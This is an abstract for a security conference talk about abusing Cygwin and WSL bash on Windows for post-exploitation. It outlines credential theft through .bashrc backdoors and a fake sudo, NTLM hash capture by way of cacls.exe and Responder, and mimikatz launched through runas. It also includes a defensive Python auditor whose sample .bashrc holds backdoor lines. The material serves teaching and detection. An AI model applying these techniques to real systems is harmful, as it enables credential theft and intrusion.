»Abusing Bash for Windows«
2018-10-17, 10:30–10:50, Europe

This presentation showcases how to use bash on Windows (Cygwin, WSL) for privilege escalation and post-exploitation. Tricks that will be presented here use existing tool features: no vulnerabilities/0days will be exploited. We also assume that you can already execute code on the target.

A Bash equivalent has been available on Windows since 2001 through Cygwin (https://www.cygwin.com/). With Windows 10, an alternative is available: WSL (https://github.com/Microsoft/WSL). These tools are interesting for an attacker because they are used by both administrators and developers. This talk is about using them to perform privilege escalation or post-exploitation.

Everything here assumes that you can already execute code on the target.

No vulnerabilities/0days will be exploited.

The introduction will present the different ways of having bash on Windows (Cygwin and WSL):

  • installation process,
  • APT/YUM-like tools,
  • possible interactions between Windows CMD and Cygwin/WSL,
  • editing the "Linux" file system from Windows.

This introduction is particularly important: many of the tricks are based on internal functions and mechanisms of Cygwin and WSL.

Then, multiple cases will be studied:

Remote shell with AV bypass

Is it possible to use Cygwin or WSL to get a remote shell? Can it be made persistent? Which remote shells can be used natively? On WSL this is a good way to bypass some AV products.

Get sudo hash (on WSL)

This is based on the fact that on WSL you need sudo to read the /etc/shadow file. But this file lives in the Windows user directory (). So you can read it directly from Windows. Then, if you are lucky enough to crack the password, you can hope that the user reused it somewhere else (for example as their local Windows admin password).

Backdoor bash for hash and passwords

All of these are based on a classic trick: adding entries to .bashrc.

Adding an alias

An alias is added to .bashrc. Then a backdoored version of the program is dropped. Each time the user calls the program by name (relying on the PATH lookup), the backdoored version is launched instead.

Adding a startup script

A script is added to the WSL/Cygwin startup. By using the interaction between the Cygwin/WSL shell and the Windows world, it is possible to grab data.

Below is a list of possible malicious actions:

  • Get WSL sudo password: add a fake sudo program in order to steal the password
  • Get domain hash: call cacls.exe (or an equivalent; a list is available here: https://gist.github.com/anonymous/70f792d50078f0ee795d39d0aa0da46e) in order to send an NTLMv2 authentication request over the network. Responder (or an equivalent; https://github.com/SpiderLabs/Responder) must be listening on the called network service.
  • Get domain password: call a fake Windows authentication window or prompt directly in the shell. Beware, this can look really suspicious because devs or admins (the targets here) may know the inner workings of the system well.
  • Get local admin privilege: call runas in order to get a local admin binary running (mimikatz, for example). This is also especially likely to trigger suspicion.
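As an added, defensive example (not code from the talk or its author), the following Python script audits a shell startup file for the backdoor patterns described above: aliases that shadow security-sensitive commands, PATH entries that place a user-writable directory ahead of the system directories (where a fake sudo would be found first), scripts sourced or launched from user-controlled locations, and Windows executables started from the Linux-side startup file. The command list, the directory prefixes and the sample .bashrc are constructed for illustration and are assumptions, not values from the talk.

```python
"""Audit bash startup files (WSL/Cygwin) for .bashrc backdoor patterns.

Added defensive example. Heuristics, constants and the sample .bashrc below are
constructed for illustration; tune them to the environment being audited.
"""
import re
import shlex
from dataclasses import dataclass
from pathlib import Path

# Commands whose shadowing by an alias or a fake binary lets an attacker
# capture credentials (fake sudo) or hijack a session. Constructed list.
SENSITIVE_COMMANDS = {"sudo", "su", "ssh", "scp", "sftp", "git", "passwd", "gpg"}

# Directory prefixes an unprivileged user controls; a fake binary dropped here
# and placed before /usr/bin in PATH wins the lookup. Constructed list.
USER_WRITABLE_PREFIXES = ("~", "$HOME", "${HOME}", "/tmp", "/dev/shm",
                          "/mnt/c/Users", "/cygdrive/c/Users")

# Words that only launch or source a script; the script path follows them.
LAUNCHERS = {"source", ".", "bash", "sh", "exec", "nohup", "setsid"}

ALIAS_RE = re.compile(r"^alias\s+([A-Za-z0-9_.-]+)=(.*)$")
PATH_RE = re.compile(r"^(?:export\s+)?PATH=(.*)$")


@dataclass(frozen=True)
class Finding:
    kind: str
    line_no: int
    line: str


def _unquote(value: str) -> str:
    value = value.strip()
    if len(value) >= 2 and value[0] == value[-1] and value[0] in "'\"":
        return value[1:-1]
    return value


def _user_writable(path: str) -> bool:
    return path.startswith(USER_WRITABLE_PREFIXES)


def audit_text(text: str) -> list[Finding]:
    """Return one Finding per suspicious line of a startup file's content."""
    findings: list[Finding] = []
    for line_no, raw in enumerate(text.splitlines(), start=1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue

        m = ALIAS_RE.match(line)
        if m:
            name, target = m.group(1), _unquote(m.group(2))
            if name in SENSITIVE_COMMANDS:
                findings.append(Finding("alias-shadows-sensitive-command", line_no, raw))
            elif target and _user_writable(target.split()[0]):
                findings.append(Finding("alias-points-to-user-writable-path", line_no, raw))
            continue

        m = PATH_RE.match(line)
        if m:
            for entry in _unquote(m.group(1)).split(":"):
                if entry in ("$PATH", "${PATH}"):
                    break  # directories appended after the old PATH do not shadow system binaries
                if _user_writable(entry):
                    findings.append(Finding("path-prepends-user-writable-dir", line_no, raw))
                    break
            continue

        try:
            tokens = shlex.split(line, comments=True)
        except ValueError:
            tokens = line.split()
        if tokens and tokens[-1] == "&":
            tokens = tokens[:-1]  # backgrounding marker is not an argument
        # A Windows binary started from the Linux-side startup file.
        if any(t.lower().endswith(".exe") for t in tokens):
            findings.append(Finding("windows-binary-run-at-startup", line_no, raw))
            continue
        launched = False
        while tokens and tokens[0] in LAUNCHERS:
            tokens.pop(0)
            launched = True
        if launched and tokens and _user_writable(tokens[0]):
            findings.append(Finding("startup-script-from-user-writable-dir", line_no, raw))
    return findings


def audit_home(home: Path) -> list[Finding]:
    """Audit the usual bash startup files under a home directory."""
    findings: list[Finding] = []
    for name in (".bashrc", ".bash_profile", ".profile", ".bash_aliases"):
        path = home / name
        if path.is_file():
            findings.extend(audit_text(path.read_text(errors="replace")))
    return findings


# Constructed sample ~/.bashrc; not captured from a real system.
SAMPLE_BASHRC = """\
# constructed sample, lines 2-6 are benign, shadowed sudo, PATH prepend, startup script, Windows binary
alias ll='ls -la'
alias sudo='$HOME/.local/bin/sudo'
export PATH="$HOME/.local/bin:$PATH"
source ~/.cache/.init.sh &
/mnt/c/Windows/System32/cacls.exe '\\\\placeholder-host\\share' >/dev/null 2>&1 &
"""

if __name__ == "__main__":
    for f in audit_text(SAMPLE_BASHRC):
        print(f"line {f.line_no}: {f.kind}: {f.line}")
```

Run against a real home with `audit_home(Path.home())`; on the Windows side the same function can be pointed at a Cygwin home or at the WSL distribution's root file system, since the startup files are ordinary files there too.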

Applocker bypass

This part is still under research; conclusions will be provided even if no bypass turns out to be possible. My aim here is to abuse the AppLocker configuration in order to run unwanted programs on the target.

As many points are based on features of Cygwin and WSL, countermeasures are not necessarily obvious. They will be discussed at the end of the talk.

In addition, I can also provide jail-escaping tricks for Linux that will be tested on the UNIX tool ports for Windows (gVIM, GnuWin32, UnxUtils). These additional slides will not be detailed during the talk, but the tricks will be available for interested people.
